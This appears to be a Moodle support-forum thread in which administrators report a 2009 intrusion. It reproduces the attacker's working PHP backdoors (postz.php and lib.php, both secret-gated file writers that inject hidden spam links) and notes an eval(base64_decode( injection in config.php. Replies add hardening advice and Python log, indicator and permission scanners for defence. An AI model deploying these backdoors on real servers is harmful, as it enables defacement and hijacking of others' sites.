Example of an intrusion into Moodle

by Stellan Kinberg -
Number of replies: 6
Reading the log carefully, I have discovered that someone has uploaded files into my moodle dir. I don't know yet how he did it, as I have no log from the time the files were created. Here is a description of the three files that I found.

On the 23rd of July, someone (probably 69.65.40.176) uploaded postz.php. It contained this code:

<?php

if (!function_exists('file_get_contents')) {
    // Fallback for PHP releases older than 4.3, which have no file_get_contents()
    function file_get_contents($filename, $incpath = false, $resource_context = null) {
        if (false === $fh = fopen($filename, 'r', $incpath)) {
            return false;
        }
        clearstatcache();
        if ($fsize = @filesize($filename)) {
            $data = fread($fh, $fsize);
        } else {
            $data = '';
            while (!feof($fh)) {
                $data .= fread($fh, 8192);
            }
        }

        fclose($fh);
        return $data;
    }
}

// Hard-coded secret; the caller must POST its md5() in $_POST['secret']
$secret_key = 'sd;gij32498gjwevgfdsgvluergbw3489';
// Targets: index.php in this directory and in the three directories above it
$files_to_post = array(
    'index.php',
    '../index.php',
    '../../index.php',
    '../../../index.php'
);

$error = 0;
if (isset($_POST['data']) && isset($_POST['secret'])) {
    if (md5($secret_key) == $_POST['secret']) {
        $post_data = stripslashes($_POST['data']);
        foreach ($files_to_post as $file_to_post) {
            //read file
            if (!file_exists($file_to_post) || !is_writable($file_to_post)) {
                $error++;
                continue;
            }
            $old_file = file_get_contents($file_to_post);

            //insert links
            // An earlier payload between the <!-- moodle --> markers is replaced;
            // otherwise the payload is spliced in just before print_footer('home')
            if (preg_match('#<!-- moodle -->.+<!-- moodle -->#s', $old_file)) {
                $old_file = preg_replace('#<!-- moodle -->.+<!-- moodle -->#s', "<!-- moodle -->\n".$post_data."\n<!-- moodle -->", $old_file);
            } else {
                $old_file = preg_replace('|print_footer\(["\']home["\']\);|i', "?>\n<!-- moodle -->\n".$post_data."\n<!-- moodle -->\n<?php\nprint_footer('home');", $old_file);
            }
            //replace old file
            $hFile = fopen($file_to_post, 'w');
            if (!$hFile) {
                $error++;
                fclose($hFile);
                continue;
            }
            if (FALSE !== fwrite($hFile, $old_file)) {
                fclose($hFile);
            } else {
                $error++;
                fclose($hFile);
            }
        }
        // All four targets failed: answer with a fake 404 so the script looks dead
        if ($error === 4) {
            echo '### Error 404 ###';
        } else {
            echo 'OK';
        }
    } else {
        echo "### Error 404 ###";
    }
} else {
    echo "### Error 404 ###";
}
?>

You can read from the code that it opens /moodle/index.php and adds contents to it. 69.65.40.176 has run this several times these days. This was the last log text:
69.65.40.176 [22/Sep/2009:05:09:20 -0400] "POST /moodle/postz.php HTTP/1.1" 200 14 "-" "-"

Now that I have discovered this file, I changed its name, in case it is needed for documentation.

The log today told me also this:
69.65.40.176 [22/Sep/2009:05:46:43 -0400] "POST /moodle/gif/lib.php

The /moodle/gif dir was created 08/13/09 and it contained two files: lib.php and inc.php.

This is the content of lib.php:

<?php
// Same hard-coded secret as postz.php; writes the POSTed data straight into inc.php
$secret_key = 'sd;gij32498gjwevgfdsgvluergbw3489';
$file_to_post = 'inc.php';
if (isset($_POST['data']) && isset($_POST['secret'])) {
    if (md5($secret_key) == $_POST['secret']) {
        $hFile = fopen($file_to_post, 'w');
        if (!$hFile) {
            die('error opening file');
        }
        if (FALSE !== fwrite($hFile, stripslashes($_POST['data']))) {
            echo 'OK';
            fclose($hFile);
        } else {
            echo '### 404 ###';
        }
    } else {
        echo "### 404 ###";
    }
} else {
    echo "### 404 ###";
}
?>

The inc.php contained this code:

<u style="display:none;"><a href="http://mackenzie.ce.washington.edu/CFVST/?p=buy-viagra.php">buy cheap uk viagra</a>dd614d5<a href="http://mackenzie.ce.washington.edu/CFVST/?p=buy-viagra.php">next dat delivery generic viagra</a>e0f7ec3</u>

Well, I hope that by changing my password and changing the names of these files I will get some peace.

I still wonder who this 69.65.40.176 is and how he/she succeeded in uploading the files.
Any idea?

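The two log lines quoted in this post already give a usable detection rule: a request to a PHP script that is not part of the Moodle install, in particular a POST from a client that sends neither a referer nor a user-agent, is the thing to hunt for in the rest of the access log. The script below is an added example written for this thread; it is not code from the post, from the dropped files or from Moodle. The log lines it reads are constructed in the same shape as the two quoted above (203.0.113.7 is a documentation address), and KNOWN_SCRIPTS is an assumed stand-in for a manifest of script paths generated from a clean copy of the Moodle tree.

```python
import re
from collections import defaultdict

# Constructed lines in the same shape as the two quoted in the post (this format
# has no identd/userid fields between the client address and the timestamp).
SAMPLE_LOG = """\
69.65.40.176 [22/Sep/2009:05:09:20 -0400] "POST /moodle/postz.php HTTP/1.1" 200 14 "-" "-"
69.65.40.176 [22/Sep/2009:05:46:43 -0400] "POST /moodle/gif/lib.php HTTP/1.1" 200 2 "-" "-"
203.0.113.7 [22/Sep/2009:06:01:02 -0400] "GET /moodle/index.php HTTP/1.1" 200 8421 "-" "Mozilla/5.0"
203.0.113.7 [22/Sep/2009:06:01:30 -0400] "POST /moodle/login/index.php HTTP/1.1" 303 0 "http://example.test/moodle/" "Mozilla/5.0"
"""

# Assumed manifest of script paths that belong to the install. Build the real one
# from a clean copy of the Moodle tree, never from the possibly tampered server.
KNOWN_SCRIPTS = {"/moodle/index.php", "/moodle/login/index.php", "/moodle/course/view.php"}

LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?:\S+ \S+ )?\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

def parse_line(line):
    """Split one access-log line into fields, or return None if it is not a request line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    rec["status"] = int(rec["status"])
    return rec

def find_suspicious(log_text, known_scripts):
    """Return {client_ip: [description, ...]} for hits on PHP scripts outside the manifest."""
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec["path"].endswith(".php"):
            continue
        if rec["path"] in known_scripts:
            continue
        # A script that is not part of the install answering at all is the main signal;
        # a POST with neither referer nor user-agent means a program, not a browser, drove it.
        note = f'{rec["method"]} {rec["path"]} -> {rec["status"]}'
        if rec["method"] == "POST" and rec["referer"] == "-" and rec["agent"] == "-":
            note += " (scripted client: no referer, no user-agent)"
        findings[rec["ip"]].append(note)
    return dict(findings)

if __name__ == "__main__":
    for ip, notes in find_suspicious(SAMPLE_LOG, KNOWN_SCRIPTS).items():
        print(ip)
        for note in notes:
            print("   ", note)
```

To use it on a real server, read the access log into find_suspicious() in place of SAMPLE_LOG. The weak point is the manifest: it has to come from a pristine copy of the same Moodle release, because the server's own tree may already contain the dropped files and would whitelist them.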
In reply to Stellan Kinberg

Re: Example of an intrusion into Moodle

by Timothy Kane -
The IP address goes to:
69.65.40.176 - Geo Information
IP Address 69.65.40.176
Host chi.hd-gaming.com
Location US US, United States
City Arlington Heights, IL 60005
Organization GigeNET
ISP GigeNET

I got a hack like yours last night.

Timothy Kane
http://trainig.nvabc.com
In reply to Timothy Kane

Re: Example of an intrusion into Moodle

by Timothy Kane -
Check the config.php file!

I found in the first line "eval(base64_decode(" with a huge number after it.
It should not be there. It should look something like this.

<?PHP // $Id: config-dist.php,v 1.98 2006/11/11 17:23:33 skodak Exp $
///////////////////////////////////////////////////////////////////////////

See the Moodle info on base64_decode

Tim
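
Everything quoted in this thread so far leaves a textual trace in the web root: the <!-- moodle --> marker pair that postz.php wraps around its payload, the display:none container that inc.php uses to hide the links, and the eval(base64_decode( that Tim found at the top of config.php. The scanner below is an added example for this thread, not code from any post or from Moodle. It builds a small constructed directory tree with files shaped like the ones quoted (the spam URL and the base64 string are made up; the base64 decodes to the word hello) and scans it, so it runs offline; point scan_tree() at a real web root to use it.

```python
import os
import re
import tempfile

# Indicators taken from the files quoted in this thread: the marker pair postz.php
# writes around its payload, the eval(base64_decode( found in config.php, and a
# display:none container followed directly by a link, as in inc.php.
INDICATORS = [
    ("injected marker block", re.compile(r"<!-- moodle -->.+?<!-- moodle -->", re.S)),
    ("eval of base64 payload", re.compile(r"eval\s*\(\s*base64_decode\s*\(", re.I)),
    ("hidden link block", re.compile(r"<[a-z]+[^>]*display\s*:\s*none[^>]*>\s*<a\s+href", re.I)),
]

def scan_text(text):
    """Names of every indicator present in one file's contents, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(text)]

def scan_tree(root, exts=(".php", ".html", ".htm", ".inc")):
    """Map of relative path -> indicator names for every file under root that matches."""
    hits = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    found = scan_text(fh.read())
            except OSError:
                continue
            if found:
                hits[os.path.relpath(path, root).replace(os.sep, "/")] = found
    return hits

def build_sample_tree():
    """Constructed web root shaped like the files in the thread (URL and payload made up)."""
    root = tempfile.mkdtemp(prefix="moodle-scan-")
    files = {
        "lib/weblib.php": "<?php\nfunction format_text($text) { return $text; }\n",
        "index.php": (
            "<?php\nrequire('config.php');\n?>\n"
            "<!-- moodle -->\n"
            '<u style="display:none;"><a href="http://spam.invalid/">cheap</a></u>\n'
            "<!-- moodle -->\n"
            "<?php\nprint_footer('home');\n"
        ),
        "config.php": "<?php eval(base64_decode('aGVsbG8=')); // constructed, decodes to 'hello'\n",
        "gif/inc.php": '<u style="display:none;"><a href="http://spam.invalid/">buy</a></u>',
        # hidden container with no link: must not be reported
        "theme/header.php": '<div style="display:none">no link here</div>\n',
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, found in sorted(scan_tree(build_sample_tree()).items()):
        print(rel, "->", ", ".join(found))
```

The hidden-link rule requires the anchor to follow the display:none tag directly, which is how inc.php is built; a looser rule would light up on legitimate themes that hide a container and put a link somewhere inside it. Any rule like the eval one will produce some noise on a large tree, so review each hit by hand before deleting anything.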
In reply to Stellan Kinberg

Re: Example of an intrusion into Moodle

by Ken Task -
Folks just can't leave well enough alone, can they? :\ Sigh.
Found the postz.php file in a 1.8.x version installed on a server. Like you, I've re-named AND moved it out of the web root into another directory for inspection, etc.

Now I don't know if this is considered proper, but I grew tired of being "network nice", so I re-created the postz.php file, only it's no longer writable by anyone and has a 0-second wait auto-forward back to the offending IP address identified. Not trying to start any network war, but figured if it's trying to phone home, I'll help it find "home" pronto!

Yours, in the "spirit of sharing",
Ken

In reply to Ken Task

Re: Example of an intrusion into Moodle

by Timothy Kane -
Check your theme header.php file.

This led me to a host of other things I found.

I found a piece of code there that referred to an old moodle site I had. It loaded code from the SSO folder and a file called tag.php, which didn't belong there. That is where I found all the html links code.

I have left the php files but have changed the code in them to make them harmless.
Hopefully if they try another attack it will take a lot more work.
I changed the config file to 644. I am trying to find out if I can change it to 400.

I found some of my .htaccess files were backed up to .htaccess_bk and then a new .htaccess was installed to make all the directories readable.

I have placed an index.html file in the directories so if it happens again the index.html will come up, not the directory listing. The index.html redirects to the main page.

I changed my FTP, MySql and Moodle Admin passwords.

I put in a php.ini in the main directory

register_globals = 0 ;(necessary)
safe_mode = 0 ;(necessary)
memory_limit = 40M ;(varies: minimum 16M, 32M Moodle v1.7, 40M Moodle v1.8, 128M large sites)
session.save_handler = files ;(unless you are using another handler, e.g. mm)
magic_quotes_gpc = 1 ;(preferred but not necessary, 0 will be highly recommended in 2.0)
magic_quotes_runtime = 0 ;(necessary)
file_uploads = 1
session.auto_start = 0 ;(necessary)
session.bug_compat_warn = 0
post_max_size = 2M
upload_max_filesize = 2M

I downloaded my site to my hard drive. I then downloaded a 30-day trial of Kaspersky Anti-Virus.
It found that the attack was done with a PHP Trojan horse.

This may not stop anybody, but hopefully it will slow them down and they will look for an easier target.

Tim
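
The hardening steps in the post above (the php.ini values marked necessary, tighter permissions on config.php, .htaccess files swapped for ones that turn directory listing on with a .htaccess_bk left behind, and an index file in every directory) can all be checked mechanically. The Python below is an added example written for this thread, not code from the post or from Moodle. It parses a php.ini fragment in the format quoted above and walks a constructed web root. Whether config.php can be made unreadable to group and others (0400 instead of 0644) depends on which user the PHP interpreter runs as, which is the open question in the post, so that check is worded as something to verify rather than a definite fault.

```python
import os
import stat
import tempfile

# Settings the post marks "(necessary)", with the value it requires.
REQUIRED_INI = {
    "register_globals": "0",
    "safe_mode": "0",
    "magic_quotes_runtime": "0",
    "session.auto_start": "0",
}

# Constructed copy of the php.ini fragment quoted in the post (comments shortened).
SAMPLE_INI = """\
register_globals = 0 ;(necessary)
safe_mode = 0 ;(necessary)
memory_limit = 40M ;(varies by Moodle version and site size)
session.save_handler = files ;(unless you are using another handler)
magic_quotes_gpc = 1 ;(preferred but not necessary)
magic_quotes_runtime = 0 ;(necessary)
file_uploads = 1
session.auto_start = 0 ;(necessary)
post_max_size = 2M
upload_max_filesize = 2M
"""

def parse_php_ini(text):
    """Read 'key = value' lines; a ';' starts a comment, as in the post's annotations."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.lower()
    return settings

def check_php_ini(text):
    """Return the required settings that are missing or not switched off."""
    settings = parse_php_ini(text)
    problems = []
    for key, want in REQUIRED_INI.items():
        have = settings.get(key)
        if have is None:
            problems.append(f"{key}: not set (expected {want})")
        elif have not in (want, "off"):  # php.ini treats 0 and Off alike
            problems.append(f"{key}: {have} (expected {want})")
    return problems

def options_enable_indexes(htaccess_text):
    """True if an Options line in the .htaccess turns directory listing on."""
    for line in htaccess_text.splitlines():
        tokens = line.split()
        if tokens and tokens[0].lower() == "options":
            if any(t.lower() in ("indexes", "+indexes") for t in tokens[1:]):
                return True
    return False

def audit_webroot(root):
    """Walk the web root and return one finding per symptom described in the post."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        rel = os.path.relpath(dirpath, root).replace(os.sep, "/")
        rel = "" if rel == "." else rel + "/"
        for fn in filenames:
            path = os.path.join(dirpath, fn)
            mode = stat.S_IMODE(os.lstat(path).st_mode)
            name = rel + fn
            if fn == "config.php" and mode & 0o077:
                # config.php holds the DB password. 0400 only works if PHP runs as the
                # file's owner (the open question in the post), so report it for review.
                findings.append(f"{name}: mode {mode:04o} readable by group/others (try 0400 if PHP runs as owner)")
            elif mode & stat.S_IWOTH:
                findings.append(f"{name}: world-writable ({mode:04o})")
            if fn == ".htaccess_bk":
                findings.append(f"{name}: backup left behind by an .htaccess swap")
            if fn == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if options_enable_indexes(fh.read()):
                        findings.append(f"{name}: enables directory listing (Options Indexes)")
        if not any(i in filenames for i in ("index.php", "index.html", "index.htm")):
            findings.append(f"{rel or '/'}: no index file, listing depends on server config")
    return findings

def build_sample_root():
    """Constructed web root: one clean directory and one showing the post's symptoms."""
    root = tempfile.mkdtemp(prefix="moodle-audit-")
    layout = {
        "index.php": ("<?php require('config.php');\n", 0o644),
        "config.php": ("<?php $CFG->dbpass = 'constructed';\n", 0o644),
        "theme/index.html": ('<meta http-equiv="refresh" content="0;url=/moodle/">\n', 0o644),
        "theme/.htaccess": ("Options -Indexes\n", 0o644),
        "gif/lib.php": ("<?php // constructed stand-in for the dropped file\n", 0o666),
        "gif/.htaccess": ("Options +Indexes\n", 0o644),
        "gif/.htaccess_bk": ("Options -Indexes\n", 0o644),
    }
    for rel, (body, mode) in layout.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)
    return root
```

Call check_php_ini() with the contents of the php.ini that actually applies to the site (the one in the main directory, as in the post) and audit_webroot() with the Moodle directory; on the constructed tree the audit reports config.php, the world-writable gif/lib.php, the swapped gif/.htaccess and its backup, and the gif directory with no index file, and nothing under theme.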


In reply to Stellan Kinberg

Re: Example of an intrusion into Moodle

by Raniere Magalhaes -

Hello,

Could you tell me which software version you’re using for:
PHP?
Moodle?
Have you used all of the best safety practices recommended at moodle.org?

In reply to Raniere Magalhaes

Re: Example of an intrusion into Moodle

by Timothy Kane -
I am using a version of PHP 5.

I updated to the latest version of Moodle.

My hosting provider changed some of their internal settings for my site to make an attack much harder.

Tim